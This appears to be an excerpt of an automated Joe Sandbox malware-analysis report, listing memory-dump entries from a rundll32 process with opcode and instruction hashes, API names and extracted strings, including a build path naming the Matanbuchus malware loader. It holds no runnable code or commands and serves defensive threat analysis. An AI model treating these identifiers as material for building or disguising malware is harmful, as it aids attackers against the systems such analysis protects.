                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 7b9c87e9afd39c00dd00c5823594fcd6bdc2f58ae18158cf3f96982254b84ba8
                  • Instruction ID: e59f46de62a11ad34f31768ee61a22bff705e191eb580cb2512f6644f895ff27
                  • Opcode Fuzzy Hash: 7b9c87e9afd39c00dd00c5823594fcd6bdc2f58ae18158cf3f96982254b84ba8
                  • Instruction Fuzzy Hash: D1C17978A05229CFDB65CF58C890BDDBBB1BF49304F1081DAD859A7341D731AA86CF90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 7b9c87e9afd39c00dd00c5823594fcd6bdc2f58ae18158cf3f96982254b84ba8
                  • Instruction ID: 5c13c4e662bf9b51f9cc7adeb1271a67475c571d810aaabbc02a247e4fe0cef0
                  • Opcode Fuzzy Hash: 7b9c87e9afd39c00dd00c5823594fcd6bdc2f58ae18158cf3f96982254b84ba8
                  • Instruction Fuzzy Hash: 2AC17978A052698FDB65CF58C890BDDBBB1BF49304F1081DAD869A7341D731AA86CF90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aullrem
                  • String ID: N/A
                  • API String ID: 3758378126-2525114547
                  • Opcode ID: a408adbf2cb9000eda86d71570e5ad54ed6d278f3e4b5658704262bc045170ec
                  • Instruction ID: 930f9960e4a879ed1c310b1b52617f31fd9520257d057cc23ee126102f865e7c
                  • Opcode Fuzzy Hash: a408adbf2cb9000eda86d71570e5ad54ed6d278f3e4b5658704262bc045170ec
                  • Instruction Fuzzy Hash: 0BB1D178E042589FCB18CF99C890AEEFBB2BF88314F148199D849BB345D735AA41CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aullrem
                  • String ID: N/A
                  • API String ID: 3758378126-2525114547
                  • Opcode ID: b54625a3d0a7a7cfd636c175061698accbfab3a8c60048c296c69fea7d098c73
                  • Instruction ID: 11f97769d8b4823d403f59712f2ddbfa67020e3729e4e682cdf2aee347de7426
                  • Opcode Fuzzy Hash: b54625a3d0a7a7cfd636c175061698accbfab3a8c60048c296c69fea7d098c73
                  • Instruction Fuzzy Hash: 3EB1D1B8E042589FCB14CF99C890AEDFBB2BF89314F248199D849BB345D734AA45CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: N/A
                  • API String ID: 0-2525114547
                  • Opcode ID: 1e8cc9b3e53f42a128cec5e00051cbc583a9946e0e0a30b3f4776622f990f161
                  • Instruction ID: 95f69549462ceab3575a2bfe714b9f224b9964cfaabe010e38945ba6a2612827
                  • Opcode Fuzzy Hash: 1e8cc9b3e53f42a128cec5e00051cbc583a9946e0e0a30b3f4776622f990f161
                  • Instruction Fuzzy Hash: F5A1DEB8E052589FCB14CF99C890ADDFBB2BF89314F208199D849B7305D731AA41CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: N/A
                  • API String ID: 0-2525114547
                  • Opcode ID: a479a1a11e7ac01f4b1b0b533bfda488c63fa71be842cbc2978c3abb9010eb4d
                  • Instruction ID: 04890df7099bb5dc0e14d0a7d6d66fa757572ff06d5d51fc0a3d7bddea59ed46
                  • Opcode Fuzzy Hash: a479a1a11e7ac01f4b1b0b533bfda488c63fa71be842cbc2978c3abb9010eb4d
                  • Instruction Fuzzy Hash: 95A1CE78E042589FCB14CF99C990AEEFBB2BF88304F24819AD859B7345D730AA41CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 83e0b7b25a6414a84c0e0142b72090c2c442b72fd0aa82bb8a28633587738baa
                  • Instruction ID: 4997f3d2e1991ad1228f12de219fc00b222d307e4ff8db66f550636d60199e54
                  • Opcode Fuzzy Hash: 83e0b7b25a6414a84c0e0142b72090c2c442b72fd0aa82bb8a28633587738baa
                  • Instruction Fuzzy Hash: 26A14B78A052698FDB65CF58C890BDDBBB1BF49304F1081DAD819A7345DB31AA86CF90
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |J
                  • API String ID: 0-1146653492
                  • Opcode ID: 83e0b7b25a6414a84c0e0142b72090c2c442b72fd0aa82bb8a28633587738baa
                  • Instruction ID: bd84dfa4189ea0a071aeffc0b4bf4218327ba73d3ceac1225af8e0186d208ab2
                  • Opcode Fuzzy Hash: 83e0b7b25a6414a84c0e0142b72090c2c442b72fd0aa82bb8a28633587738baa
                  • Instruction Fuzzy Hash: 5EA16B78E052698FDB65CF58C890BDDBBB1BF49304F1081DAD859A7341DB31AA86CF90
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                  • Instruction ID: 91bb2bd0ef403b9c62cda6b3556143d8cc3fd09a5969b90bc3b5adb014cc1ac0
                  • Opcode Fuzzy Hash: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                  • Instruction Fuzzy Hash: 60A28C78E052698FDB64CF59C994BDDBBB2BF49304F1081DAD84AA7345E734AA81CF40
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98d216f662c43ea8221a0d9b000a859a58b8a4a5edd8dd49a0006bcc8d2ebf64
                  • Instruction ID: bb41f22d70803963725eefda7dd3f4272b023ab9fbb08c2e8713872d72ca4510
                  • Opcode Fuzzy Hash: 98d216f662c43ea8221a0d9b000a859a58b8a4a5edd8dd49a0006bcc8d2ebf64
                  • Instruction Fuzzy Hash: 51227E78E04269CFCB69CF58C890B99BBB5BF89304F1481DAD849A7355DB30AE85CF50
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                  • Instruction ID: 2361a3d4b2284d51ae54bf3cf12eea419ff72c39532b7a73609c674c542a4ef6
                  • Opcode Fuzzy Hash: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                  • Instruction Fuzzy Hash: 53129F78E05269CFDB64CF58C994B9DB7B2BF89304F2081D9D84AA7345E734AA81CF50
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                  • Instruction ID: 6670bf7f5125efd136958dbd7d737c18e262ab1448d01dc45fc17a46957a0640
                  • Opcode Fuzzy Hash: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                  • Instruction Fuzzy Hash: D8D1C578A01209DFCB05CF59C491A9DBBB2FF89324F15C199E866AB355C730E981CF81
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdf8e3209bdd4fc91c8ff4c4adb3c29e1a09ff1ca6483feba9918616b66066aa
                  • Instruction ID: cfeec7f52a3e350f1acea85348bd4d2eda7215fc18ede6086320df17e87c9e48
                  • Opcode Fuzzy Hash: bdf8e3209bdd4fc91c8ff4c4adb3c29e1a09ff1ca6483feba9918616b66066aa
                  • Instruction Fuzzy Hash: 16F18FB8E042688BCB69CF69C890BDDBBB5BF49300F1081DAD849A7355D731AE85CF54
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 249e7c0daf79476472ea1371d85ac99d9d5f43f518e2655eb6e59f8d02d1c74d
                  • Instruction ID: 8a574ceb34d1cbf2dbbaa98f3f0a0eba33bb6ecbe1e7957edcc76c6ce1ba9bf7
                  • Opcode Fuzzy Hash: 249e7c0daf79476472ea1371d85ac99d9d5f43f518e2655eb6e59f8d02d1c74d
                  • Instruction Fuzzy Hash: 24E19C78E042688FCB69CF58C890B9DBBB5BF48314F1085DAD849A7355DB30AE85CF94
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                  • Instruction ID: 2b0c57a709f9621a2883d3e47937b2fd595e1ade5847f3223951e94253300ba7
                  • Opcode Fuzzy Hash: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                  • Instruction Fuzzy Hash: 42D16B78E05268CFCB64CF59C994BDDBBB1BB88314F1481DAD849A7355EB31AA81CF40
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                  • Instruction ID: 48d8b84739bfcea5d7f672af76f4a94070c92767c3a7e1b633afb8af2a69108b
                  • Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                  • Instruction Fuzzy Hash: 61B18278E01219DFCB14CF99C590AADFBB2FF48314F248199D85AAB355E734AA81CF50
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f10276e956befeeaa7ced716b956c6824a47d49775c592e5c941de5b1ea8d7c0
                  • Instruction ID: 866afd950153775143471af8f5cda62f0d5f529a1fdc7c8094405cf09b2f1dbd
                  • Opcode Fuzzy Hash: f10276e956befeeaa7ced716b956c6824a47d49775c592e5c941de5b1ea8d7c0
                  • Instruction Fuzzy Hash: 3E918FB8E04259DFCB08CF99C490AADFBB2BF48314F20829AD856BB345D734A941CF54
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3032703f76500362cf4b7cfd221674ff43be8acbfffa5a99cfefce05e8a5c357
                  • Instruction ID: 9239dfc8d44e56aa9483f8ab09c6fd3c1e78ba519f452ff7df0914457f9a0b64
                  • Opcode Fuzzy Hash: 3032703f76500362cf4b7cfd221674ff43be8acbfffa5a99cfefce05e8a5c357
                  • Instruction Fuzzy Hash: 02819DB8E05249DFCB04CFA9C490AEDFBB2BF48314F248199D855AB355D735A942CF90
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 866902b3044bd094f8508b1a65a54e8da6f79c08e34d2fb9c17f4e12bac02c0b
                  • Instruction ID: 6b3c518b669bf447c5f12f40ef4259604bca7d0f2e63f7e4f94478f1fa357491
                  • Opcode Fuzzy Hash: 866902b3044bd094f8508b1a65a54e8da6f79c08e34d2fb9c17f4e12bac02c0b
                  • Instruction Fuzzy Hash: 5C916E78E052688FCB69CF58C990BD9BBB2BB49304F1081D9D94AA7345DB349E85CF80
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bd8be311e9f93cccf91cf0fe4bc8b4eab894b161db92d9d654ceec9270ab8ad
                  • Instruction ID: d43453d02daa7b3bd618a1c039722aed80171722a2d0daafe79b5945123d908b
                  • Opcode Fuzzy Hash: 2bd8be311e9f93cccf91cf0fe4bc8b4eab894b161db92d9d654ceec9270ab8ad
                  • Instruction Fuzzy Hash: C8518175E00219EFDF05CF99C940AAEBBB2FF88314F19845DE945AB205C734AA50CB95
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                  • Instruction ID: 30a99c214ea3e1e72e9f01433d747a85269d0a44a586ba2e8365b19b748dd1d8
                  • Opcode Fuzzy Hash: 6da16525bf5588034099ad3ebae02f39126e56f85074f42ce83d4094566c102d
                  • Instruction Fuzzy Hash: DD819D78E04259DFCB08CF99C590AADBBB1BF48314F2081AAD855AB345D734AA85CF94
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fda6854198b3ea072a93ee54d9fda0e124e3ce3ac7c530e0e74e1df86b0cf882
                  • Instruction ID: 5e13c113b3d617e306478ea3c6d87d7acebffa83db4676604a1a8880f897bbb5
                  • Opcode Fuzzy Hash: fda6854198b3ea072a93ee54d9fda0e124e3ce3ac7c530e0e74e1df86b0cf882
                  • Instruction Fuzzy Hash: 9A81A0B8D042698BCB69CF58C890BEDBBB5BF49304F1082DAD859A7345D771AE85CF40
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                  • Instruction ID: 0a891010efc2ebeee61c7f6d5ae91b95d460676189c39520178fdbb542cd9ec1
                  • Opcode Fuzzy Hash: 6750dc95a881e0ba319b8d51a47873d370098e00a8ed0d55af29bcb13d909daf
                  • Instruction Fuzzy Hash: 3C716F78E01218DBCB18CF99C590AEDFBB2BF48314F248199D85AB7355E734AA81CF50
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b4c074843645f4a0fb7f181ce2945ff95a7555a8eb7a44448bc165605b574849
                  • Instruction ID: c0ad577acf6d3f66f710d344a849a6224c02724302d4c208e6959d5cda6878a6
                  • Opcode Fuzzy Hash: b4c074843645f4a0fb7f181ce2945ff95a7555a8eb7a44448bc165605b574849
                  • Instruction Fuzzy Hash: C66190B8E04259DFCB04CFA9C490AADFBB5BF48304F24815AD859BB345D735AA46CF90
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ce837d9e1be7e0355f8c0a9083ab06560e898260699e40910dc487fc3d70d93
                  • Instruction ID: 6a9611741862cb63ac4bd88c1dc38864a6d365c2ba9999b2c0ed6cba782307ee
                  • Opcode Fuzzy Hash: 7ce837d9e1be7e0355f8c0a9083ab06560e898260699e40910dc487fc3d70d93
                  • Instruction Fuzzy Hash: 62F09676668126DBC712CA9DD914F4A72EDF705B14F518841E546DB394C2B2EE8187C0
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd0aca94d3a0a2e348fae6700d8760e26fb6588593016fa1aa0b89d09257d6d0
                  • Instruction ID: c2ce1be5598d3b026c6e2bea8367bda946899f1ec31e5c5f73938b841a0c10d8
                  • Opcode Fuzzy Hash: cd0aca94d3a0a2e348fae6700d8760e26fb6588593016fa1aa0b89d09257d6d0
                  • Instruction Fuzzy Hash: 38F0C83A9102199BDB61DBA9CC44F8FB3BCEB40250F600D60D955EB112F730FE858A90
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e320de6ac5aaccb4fd38f171767733981c15d753a56d1ee24e5e2441dc4b892e
                  • Instruction ID: 97141cf87ae728495e3f0bf7e8146152c0ef788bc8fd4658f3620e5256a923a4
                  • Opcode Fuzzy Hash: e320de6ac5aaccb4fd38f171767733981c15d753a56d1ee24e5e2441dc4b892e
                  • Instruction Fuzzy Hash: 0DF06576A25265DBCB12CB8CC804B49B3FDEB44B59F114496F506D7251C7B4DE40CBC0
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                  • Instruction ID: 7cacbbe88ecc4cab0eaef6d20cf23e499f9f73f380761552353fd898b1fb0951
                  • Opcode Fuzzy Hash: 517683b43767a3535c157b2b51665dec237b95770994ae3f6177b6cbaedc1245
                  • Instruction Fuzzy Hash: 14D0127490560CEBC704CF49D540959F7F8EB48650F208199EC0C83700D632AE01CA80
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                  • Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
                  • Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
                  • Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv__aullrem
                  • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                  • API String ID: 3839614884-178659603
                  • Opcode ID: 2354981b61a010e8838c00b09fb856e1b1d7df1ce41d09f29af60224161425e1
                  • Instruction ID: c5f6c70e3ed8485d38fd8b811e9bffa2223155eaa2a93ca6907ddf79f9dba37b
                  • Opcode Fuzzy Hash: 2354981b61a010e8838c00b09fb856e1b1d7df1ce41d09f29af60224161425e1
                  • Instruction Fuzzy Hash: 0CE1AF78E01219DFDB14CF99C980B9DBBB2FB48304F2081AAD919BB354D7346A81DF59
                  APIs
                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7EE223BF), ref: 7EE22A6C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DecodePointer
                  • String ID: acos$asin$log$log10$pow$sqrt
                  • API String ID: 3527080286-3190521889
                  • Opcode ID: 98646fe4114ef7f11ed8e59e66b2d75df1dede0d283ef4c9f33a7290e3234cde
                  • Instruction ID: 45c7120b62ac5a18137e19fe28e0cf085747b93ab493c1f958e29cbed3601d89
                  • Opcode Fuzzy Hash: 98646fe4114ef7f11ed8e59e66b2d75df1dede0d283ef4c9f33a7290e3234cde
                  • Instruction Fuzzy Hash: 1D51A2B9810D1ACBCB018F56D8491AD7F7CFF0C316F104DA5E882AB26CDB768521CB54
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BaseDialogUnits
                  • String ID: :FailedAddIndicator$DD?ljh$L$\
                  • API String ID: 315647612-1844790164
                  • Opcode ID: dcd58831401d699ab1dc3d6bb604ae2cb3e9d7108312cc56a5996823cf2bf134
                  • Instruction ID: 35bbff0a5046325e066c4a3f0b3aa2907594947135cf89b16526625d40dfbc2b
                  • Opcode Fuzzy Hash: dcd58831401d699ab1dc3d6bb604ae2cb3e9d7108312cc56a5996823cf2bf134
                  • Instruction Fuzzy Hash: E2F1B67A905368CFCB15CF6AC8907FEBBBABB49300F244899E444E7266D7349A41CF51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BaseDialogUnits
                  • String ID: :FailedAddIndicator$DD?ljh$L$\
                  • API String ID: 315647612-1844790164
                  • Opcode ID: d5034c4be929abe910dc473e60aac2905c99c1e7a1a03f854ea33c4ab9a644df
                  • Instruction ID: 024de79a8833babfb8457cc773ce4907c8a494f00b8315b8f9bcbd6420fb3de6
                  • Opcode Fuzzy Hash: d5034c4be929abe910dc473e60aac2905c99c1e7a1a03f854ea33c4ab9a644df
                  • Instruction Fuzzy Hash: EFE1947A904368CECB15CFAAC9907FEBBFABB49300F144899E444E7266D7349A41CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Component%lsdidnot$Lnotadirectory$]$6a
                  • API String ID: 0-3990994670
                  • Opcode ID: a824a3525e5768b1534fc81495a1af8c246a9f3f6329d30490cc7e08c020ece0
                  • Instruction ID: 90d48f565c83a78eacb26bbcdc5dfdf9ebca6d1cacf8968b775d94d8a7ef6750
                  • Opcode Fuzzy Hash: a824a3525e5768b1534fc81495a1af8c246a9f3f6329d30490cc7e08c020ece0
                  • Instruction Fuzzy Hash: D7E1AB79D04268CBCB24CF69C8907ADBBB6BF88300F24889AE459F7355D7345A81CF59
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,00000064,00000000,?,?,000048C0,00000000), ref: 7EDFC9B8
                  • GetCurrentProcessorNumber.KERNEL32(?,?,FFFFFF7B,000000FF), ref: 7EDFCD04
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentNumberProcessorlstrlen
                  • String ID: Component%lsdidnot$Lnotadirectory$]$6a
                  • API String ID: 3648197270-3990994670
                  • Opcode ID: 2faee229093ab17db59bff9ca808801dd84c7425aa432348ccf24c28c396a605
                  • Instruction ID: 92a3869ee970d3d2d51112ee872bbd2087b73d135b5a4d8a1110b1dfee7e362d
                  • Opcode Fuzzy Hash: 2faee229093ab17db59bff9ca808801dd84c7425aa432348ccf24c28c396a605
                  • Instruction Fuzzy Hash: 5ED19A79D05268CBCB24CF6AC8907ADBBB6BF48300F20889AD459F7356D7345A81CF59
                  APIs
